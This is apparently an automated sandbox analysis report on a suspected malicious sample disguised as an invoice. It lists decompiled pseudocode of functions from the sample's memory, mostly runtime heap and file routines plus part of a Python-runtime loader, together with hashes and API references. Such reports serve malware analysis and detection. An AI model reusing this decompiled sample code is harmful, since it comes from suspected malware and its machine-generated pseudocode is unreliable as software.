                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction ID: 19d753185263835852b7fc9df9abc2640a1bb960ff59ec1e98b16808e132f909
                            • Opcode Fuzzy Hash: d838d643febb89b03841e44df8c39f16b9e227640df57acd32282dbe1a41e9df
                            • Instruction Fuzzy Hash: 05510B71A01248AFDB19DF2CCC40AA97BF5EF853A9F198168E8099B355C731ED42C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01325E01, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                            Download Yara Rule
                            C-Code - Quality: 72%
                            			E01325E01(void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed short* _a8, intOrPtr _a12, intOrPtr* _a16) {
				char _v8;
				char _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				void* _t25;

				E01325BBD( &_v32, _a8);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				if(_v12 != 0) {
					_t25 = E0132C048( &_v8, _a4, _v20, _a12, 0x180); // executed
					if(_t25 != 0) {
						goto L1;
					}
					 *0x1345e8c =  *0x1345e8c + 1;
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_a16 + 8)) = 0;
					 *((intOrPtr*)(_a16 + 0x1c)) = 0;
					 *((intOrPtr*)(_a16 + 4)) = 0;
					 *_a16 = 0;
					 *((intOrPtr*)(_a16 + 0x10)) = _v8;
					return _a16;
				}
				L1:
				return 0;
			}









                            0x01325e12
                            0x01325e1e
                            0x01325e1f
                            0x01325e20
                            0x01325e27
                            0x01325e3f
                            0x01325e49
                            0x00000000
                            0x00000000
                            0x01325e4e
                            0x01325e5a
                            0x01325e62
                            0x01325e68
                            0x01325e6e
                            0x01325e74
                            0x01325e7c
                            0x00000000
                            0x01325e7f
                            0x01325e29
                            0x00000000

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: __wsopen_s
                            • String ID:
                            • API String ID: 3347428461-0
                            • Opcode ID: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction ID: 0dc0c3045d7827aa792239f99289e8a13b79d448bc255385b7e007941630f2f9
                            • Opcode Fuzzy Hash: d5024f25d73ea64be4faa1c076f9b9f3da70eb7fae0c75ad0b7c775018cf772a
                            • Instruction Fuzzy Hash: 8311187590410AAFCF15DF58E9409DF7BF8EF49314F008499F808EB311D671EA258BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131E562, Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 91%
                            			E0131E562(void* __esi, void* __eflags) {
				intOrPtr _v12;
				void* __ecx;
				char _t16;
				void* _t17;
				void* _t26;
				void* _t28;
				void* _t30;
				char _t31;
				void* _t33;
				intOrPtr* _t35;

				_push(_t26);
				_push(_t26);
				_t16 = E01320B10(_t26, 0x40, 0x30); // executed
				_t31 = _t16;
				_v12 = _t31;
				_t28 = _t30;
				if(_t31 != 0) {
					_t2 = _t31 + 0xc00; // 0xc00
					_t17 = _t2;
					__eflags = _t31 - _t17;
					if(__eflags != 0) {
						_t3 = _t31 + 0x20; // 0x20
						_t35 = _t3;
						_t33 = _t17;
						do {
							_t4 = _t35 - 0x20; // 0x0
							E0132391E(_t28, __eflags, _t4, 0xfa0, 0);
							 *(_t35 - 8) =  *(_t35 - 8) | 0xffffffff;
							 *_t35 = 0;
							_t35 = _t35 + 0x30;
							 *((intOrPtr*)(_t35 - 0x2c)) = 0;
							 *((intOrPtr*)(_t35 - 0x28)) = 0xa0a0000;
							 *((char*)(_t35 - 0x24)) = 0xa;
							 *(_t35 - 0x23) =  *(_t35 - 0x23) & 0x000000f8;
							 *((char*)(_t35 - 0x22)) = 0;
							__eflags = _t35 - 0x20 - _t33;
						} while (__eflags != 0);
						_t31 = _v12;
					}
				} else {
					_t31 = 0;
				}
				E013209EB(0);
				return _t31;
			}













                            0x0131e567
                            0x0131e568
                            0x0131e56f
                            0x0131e574
                            0x0131e578
                            0x0131e57c
                            0x0131e57f
                            0x0131e585
                            0x0131e585
                            0x0131e58b
                            0x0131e58d
                            0x0131e590
                            0x0131e590
                            0x0131e593
                            0x0131e595
                            0x0131e59b
                            0x0131e59f
                            0x0131e5a4
                            0x0131e5a8
                            0x0131e5aa
                            0x0131e5ad
                            0x0131e5b3
                            0x0131e5ba
                            0x0131e5be
                            0x0131e5c2
                            0x0131e5c5
                            0x0131e5c5
                            0x0131e5c9
                            0x0131e5cc
                            0x0131e581
                            0x0131e581
                            0x0131e581
                            0x0131e5ce
                            0x0131e5db

                            APIs
                              • Part of subcall function 01320B10: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            • _free.LIBCMT ref: 0131E5CE
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap_free
                            • String ID:
                            • API String ID: 614378929-0
                            • Opcode ID: f3026a00f2806edfedbbcff55817a3ade2168dc5590e119bffc20b168db4bce9
                            • Instruction ID: 1260301cddfefd716b2fe5d24ca79de2d88777d5806f159145817eb7e8bfaeb1
                            • Opcode Fuzzy Hash: f3026a00f2806edfedbbcff55817a3ade2168dc5590e119bffc20b168db4bce9
                            • Instruction Fuzzy Hash: 3101F972200309ABE3369F69D841E5AFBEDFB89274F25052DE58593280FA71E905C774
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01319813, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E01319813(void* __ecx, intOrPtr _a4) {
				signed int _t13;
				void* _t16;
				void* _t24;
				signed int _t25;
				signed int _t26;
				intOrPtr _t28;

				_t28 = _a4;
				if(_t28 == 0) {
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					return E01321788() | 0xffffffff;
				}
				_push(_t25);
				_t26 = _t25 | 0xffffffff;
				if(( *(_t28 + 0xc) >> 0x0000000d & 0x00000001) != 0) {
					_t13 = E0131DA31(_t24, _t28); // executed
					_t26 = _t13; // executed
					E01321AED(_t28); // executed
					_t16 = E01321875(E013209C5(_t28)); // executed
					if(_t16 >= 0) {
						if( *(_t28 + 0x1c) != 0) {
							E013209EB( *(_t28 + 0x1c));
							 *(_t28 + 0x1c) =  *(_t28 + 0x1c) & 0x00000000;
						}
					} else {
						_t26 = _t26 | 0xffffffff;
					}
				}
				E013219EF(_t28);
				return _t26;
			}









                            0x01319819
                            0x0131981e
                            0x01319825
                            0x00000000
                            0x01319830
                            0x01319838
                            0x01319839
                            0x01319841
                            0x01319844
                            0x0131984a
                            0x0131984c
                            0x01319858
                            0x01319862
                            0x0131986d
                            0x01319872
                            0x01319877
                            0x0131987b
                            0x01319864
                            0x01319864
                            0x01319864
                            0x01319862
                            0x0131987d
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction ID: d09deeb620f9691d5acdb34e730c969156edfb58e51801daa8d62f24ce57ad41
                            • Opcode Fuzzy Hash: 53c0432bc4066464975b7a767e5d6c557e3d0b8557d8d6721c8e5e377a26fd3c
                            • Instruction Fuzzy Hash: DDF0F432901634A7EA39366D9C04B5B3A988F9233CF000725ED25931D4DA70D80287E1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320B10, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E01320B10(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x134655c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01320397();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0131C9CE())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E01328686(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









                            0x01320b10
                            0x01320b16
                            0x01320b1b
                            0x01320b29
                            0x01320b29
                            0x01320b2f
                            0x01320b31
                            0x01320b31
                            0x01320b48
                            0x01320b51
                            0x01320b59
                            0x00000000
                            0x00000000
                            0x01320b39
                            0x01320b3b
                            0x01320b5d
                            0x01320b62
                            0x01320b68
                            0x00000000
                            0x01320b68
                            0x01320b3e
                            0x01320b43
                            0x01320b44
                            0x01320b46
                            0x00000000
                            0x00000000
                            0x01320b46
                            0x00000000
                            0x01320b48
                            0x01320b21
                            0x01320b27
                            0x00000000
                            0x00000000
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01324453,00000001,00000364,?,0131A8EB,?,?,00000000), ref: 01320B51
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction ID: 68a61ba8f32d1bf29f36f3f9dd856af59d524d176bf1f703f135285cdc8536a5
                            • Opcode Fuzzy Hash: 47302dfb18cb09dba0589ace1cbd97a813322edf403d1c6ee795f274ad199083
                            • Instruction Fuzzy Hash: 72F0B431501139A7EB393E6D9804F5A7F88AB427BCF144161FA0897184CA20D40886E0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01328DC7, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                            Download Yara Rule
                            C-Code - Quality: 76%
                            			E01328DC7(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _t12;
				intOrPtr _t16;
				intOrPtr* _t26;

				 *0x1345e8c =  *0x1345e8c + 1;
				_t26 = _a4;
				_t12 = E01320A25(__ecx, 0x1000); // executed
				 *((intOrPtr*)(_t26 + 4)) = _t12;
				E013209EB(0);
				if( *((intOrPtr*)(_t26 + 4)) == 0) {
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t26 + 0x18)) = 2;
					 *((intOrPtr*)(_t26 + 4)) = _t26 + 0x14;
				} else {
					_push(0x40);
					asm("lock or [eax], ecx");
					 *((intOrPtr*)(_t26 + 0x18)) = 0x1000;
				}
				_t16 =  *((intOrPtr*)(_t26 + 4));
				 *(_t26 + 8) =  *(_t26 + 8) & 0x00000000;
				 *_t26 = _t16;
				return _t16;
			}






                            0x01328dcc
                            0x01328dd4
                            0x01328ddd
                            0x01328de4
                            0x01328de7
                            0x01328df5
                            0x01328e07
                            0x01328e0d
                            0x01328e14
                            0x01328df7
                            0x01328df7
                            0x01328dfa
                            0x01328dfd
                            0x01328dfd
                            0x01328e17
                            0x01328e1a
                            0x01328e1e
                            0x01328e23

                            APIs
                              • Part of subcall function 01320A25: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            • _free.LIBCMT ref: 01328DE7
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLast_free
                            • String ID:
                            • API String ID: 314386986-0
                            • Opcode ID: 6e1b85fd7ac82633f0d5bcd5001d2fe2a53c8e27224d68a6d12af5309b6434d1
                            • Instruction ID: 5f8a043a308e9c31cfcb5d94d8418bf533cafd92221ef6cfa35b1fdaaa5281e7
                            • Opcode Fuzzy Hash: 6e1b85fd7ac82633f0d5bcd5001d2fe2a53c8e27224d68a6d12af5309b6434d1
                            • Instruction Fuzzy Hash: 0DF062710057048FE3349F15D841B52B7F8EB04719F10882EE69E97A91DBB4B844CBD4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01320A25, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 94%
                            			E01320A25(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0131C9CE())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x134655c, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01320397();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E01328686(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







                            0x01320a25
                            0x01320a2b
                            0x01320a31
                            0x01320a63
                            0x01320a68
                            0x01320a6e
                            0x00000000
                            0x01320a6e
                            0x01320a35
                            0x01320a37
                            0x01320a37
                            0x01320a4e
                            0x01320a57
                            0x01320a5f
                            0x00000000
                            0x00000000
                            0x01320a3f
                            0x01320a41
                            0x00000000
                            0x00000000
                            0x01320a44
                            0x01320a49
                            0x01320a4a
                            0x01320a4c
                            0x00000000
                            0x00000000
                            0x01320a4c
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,013280E5,00000000,?,01320C3C,?,00000008,?,01323E2E,?,?,?), ref: 01320A57
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction ID: d0d491d4b1c5357a9d0e9361b3dd82ea35b01d9fc5ca14c5b65755a1c777e319
                            • Opcode Fuzzy Hash: bd511986b4eb213473a5afba6e0b1f55363d4da687cbf702641693d21949972b
                            • Instruction Fuzzy Hash: C0E0ED36101235A7FA397A7DAC44B5F7A9C9F423A8F950360FD5992084CA20C908C2E4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01321AED, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            C-Code - Quality: 90%
                            			E01321AED(intOrPtr* _a4) {
				signed char _t11;
				unsigned int* _t17;
				intOrPtr* _t18;

				_t18 = _a4;
				_t17 = _t18 + 0xc;
				_t11 =  *_t17 >> 0xd;
				if((_t11 & 0x00000001) != 0) {
					_t11 =  *_t17 >> 6;
					if((_t11 & 0x00000001) != 0) {
						E013209EB( *((intOrPtr*)(_t18 + 4))); // executed
						asm("lock and [edi], eax");
						 *((intOrPtr*)(_t18 + 4)) = 0;
						 *_t18 = 0;
						 *((intOrPtr*)(_t18 + 8)) = 0;
						return 0;
					}
				}
				return _t11;
			}






                            0x01321af3
                            0x01321af7
                            0x01321afc
                            0x01321b01
                            0x01321b05
                            0x01321b0a
                            0x01321b0f
                            0x01321b1a
                            0x01321b1f
                            0x01321b22
                            0x01321b24
                            0x00000000
                            0x01321b24
                            0x01321b0a
                            0x01321b2a

                            APIs
                            • _free.LIBCMT ref: 01321B0F
                              • Part of subcall function 013209EB: RtlFreeHeap.NTDLL(00000000,00000000,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?), ref: 01320A01
                              • Part of subcall function 013209EB: GetLastError.KERNEL32(?,?,01327F15,?,00000000,?,00000000,?,01327F3C,?,00000007,?,?,01328393,?,?), ref: 01320A13
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ErrorFreeHeapLast_free
                            • String ID:
                            • API String ID: 1353095263-0
                            • Opcode ID: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction ID: f4436f18820fe58bc89414c4eb61f065d8f776662e9146dbb7203b8bf18b0218
                            • Opcode Fuzzy Hash: ba0eaaabaece19fd87c933251771ca8d68957359310cc235be6b375e1344e05b
                            • Instruction Fuzzy Hash: 5DE092362003159FC724DF6DD500A86FBF4EF95725720852AE99ED3620D331E816CB80
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0132BA5E, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0132BA5E(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                            0x0132ba7b
                            0x0132ba82

                            APIs
                            • CreateFileW.KERNELBASE(00000000,00000000,?,0132BDC8,?,?,00000000,?,0132BDC8,00000000,0000000C), ref: 0132BA7B
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: CreateFile
                            • String ID:
                            • API String ID: 823142352-0
                            • Opcode ID: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction ID: 4a89b12ab46b1856e3f7aeb0d995e8205a9c6c8902c3ec5bb69bc455b9639a83
                            • Opcode Fuzzy Hash: ab088409fcd14db8c8c04050f73ef86e29dc03131c3fd2e8963f2c6e6efaa0bd
                            • Instruction Fuzzy Hash: A7D06C3200010DBBDF128E84ED06EDA3BAAFB48714F014100BA5856020C736E821AB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Non-executed Functions

                            Function 013129F0, Relevance: 265.0, APIs: 50, Strings: 101, Instructions: 708libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 18%
                            			E013129F0(struct HINSTANCE__* _a4) {
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t3;
				_Unknown_base(*)()* _t4;
				_Unknown_base(*)()* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				_Unknown_base(*)()* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				_Unknown_base(*)()* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				_Unknown_base(*)()* _t24;
				_Unknown_base(*)()* _t25;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t27;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t30;
				_Unknown_base(*)()* _t31;
				_Unknown_base(*)()* _t32;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				_Unknown_base(*)()* _t35;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t37;
				_Unknown_base(*)()* _t38;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t40;
				_Unknown_base(*)()* _t41;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t44;
				_Unknown_base(*)()* _t45;
				_Unknown_base(*)()* _t46;
				_Unknown_base(*)()* _t47;
				_Unknown_base(*)()* _t48;
				_Unknown_base(*)()* _t49;
				_Unknown_base(*)()* _t50;
				_Unknown_base(*)()* _t51;
				signed int _t54;
				signed int _t56;
				signed int _t58;
				signed int _t60;
				signed int _t62;
				signed int _t64;
				signed int _t66;
				signed int _t68;
				signed int _t70;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				signed int _t82;
				signed int _t84;
				signed int _t86;
				signed int _t88;
				signed int _t90;
				signed int _t92;
				signed int _t94;
				signed int _t96;
				signed int _t98;
				signed int _t100;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				signed int _t110;
				signed int _t112;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				signed int _t132;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				signed int _t142;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				void* _t153;
				struct HINSTANCE__* _t155;

				_t155 = _a4;
				_t2 = GetProcAddress(_t155, "Py_DontWriteBytecodeFlag");
				 *0x133c970 = _t2;
				_t207 = _t2;
				if(_t2 != 0) {
					_t3 = GetProcAddress(_t155, "Py_FileSystemDefaultEncoding");
					 *0x133c964 = _t3;
					__eflags = _t3;
					if(__eflags != 0) {
						_t4 = GetProcAddress(_t155, "Py_FrozenFlag");
						 *0x133c958 = _t4;
						__eflags = _t4;
						if(__eflags != 0) {
							_t5 = GetProcAddress(_t155, "Py_IgnoreEnvironmentFlag");
							 *0x133c96c = _t5;
							__eflags = _t5;
							if(__eflags != 0) {
								_t6 = GetProcAddress(_t155, "Py_NoSiteFlag");
								 *0x133c95c = _t6;
								__eflags = _t6;
								if(__eflags != 0) {
									_t7 = GetProcAddress(_t155, "Py_NoUserSiteDirectory");
									 *0x133c974 = _t7;
									__eflags = _t7;
									if(__eflags != 0) {
										_t8 = GetProcAddress(_t155, "Py_OptimizeFlag");
										 *0x133c960 = _t8;
										__eflags = _t8;
										if(__eflags != 0) {
											_t9 = GetProcAddress(_t155, "Py_VerboseFlag");
											 *0x133c968 = _t9;
											__eflags = _t9;
											if(__eflags != 0) {
												_t10 = GetProcAddress(_t155, "Py_BuildValue");
												 *0x133c9bc = _t10;
												__eflags = _t10;
												if(__eflags != 0) {
													_t11 = GetProcAddress(_t155, "Py_DecRef");
													 *0x133c984 = _t11;
													__eflags = _t11;
													if(__eflags != 0) {
														_t12 = GetProcAddress(_t155, "Py_Finalize");
														 *0x133c97c = _t12;
														__eflags = _t12;
														if(__eflags != 0) {
															_t13 = GetProcAddress(_t155, "Py_IncRef");
															 *0x133c980 = _t13;
															__eflags = _t13;
															if(__eflags != 0) {
																_t14 = GetProcAddress(_t155, "Py_Initialize");
																 *0x133c978 = _t14;
																__eflags = _t14;
																if(__eflags != 0) {
																	_t15 = GetProcAddress(_t155, "Py_SetPath");
																	 *0x133c990 = _t15;
																	__eflags = _t15;
																	if(__eflags != 0) {
																		_t16 = GetProcAddress(_t155, "Py_GetPath");
																		 *0x133c994 = _t16;
																		__eflags = _t16;
																		if(__eflags != 0) {
																			_t17 = GetProcAddress(_t155, "Py_SetProgramName");
																			 *0x133c988 = _t17;
																			__eflags = _t17;
																			if(__eflags != 0) {
																				_t18 = GetProcAddress(_t155, "Py_SetPythonHome");
																				 *0x133c98c = _t18;
																				__eflags = _t18;
																				if(__eflags != 0) {
																					_t19 = GetProcAddress(_t155, "PyDict_GetItemString");
																					 *0x133c9d0 = _t19;
																					__eflags = _t19;
																					if(__eflags != 0) {
																						_t20 = GetProcAddress(_t155, "PyErr_Clear");
																						 *0x133c9d4 = _t20;
																						__eflags = _t20;
																						if(__eflags != 0) {
																							_t21 = GetProcAddress(_t155, "PyErr_Occurred");
																							 *0x133c9d8 = _t21;
																							__eflags = _t21;
																							if(__eflags != 0) {
																								_t22 = GetProcAddress(_t155, "PyErr_Print");
																								 *0x133c9dc = _t22;
																								__eflags = _t22;
																								if(__eflags != 0) {
																									_t23 = GetProcAddress(_t155, "PyErr_Fetch");
																									 *0x133ca0c = _t23;
																									__eflags = _t23;
																									if(__eflags != 0) {
																										_t24 = GetProcAddress(_t155, "PyErr_Restore");
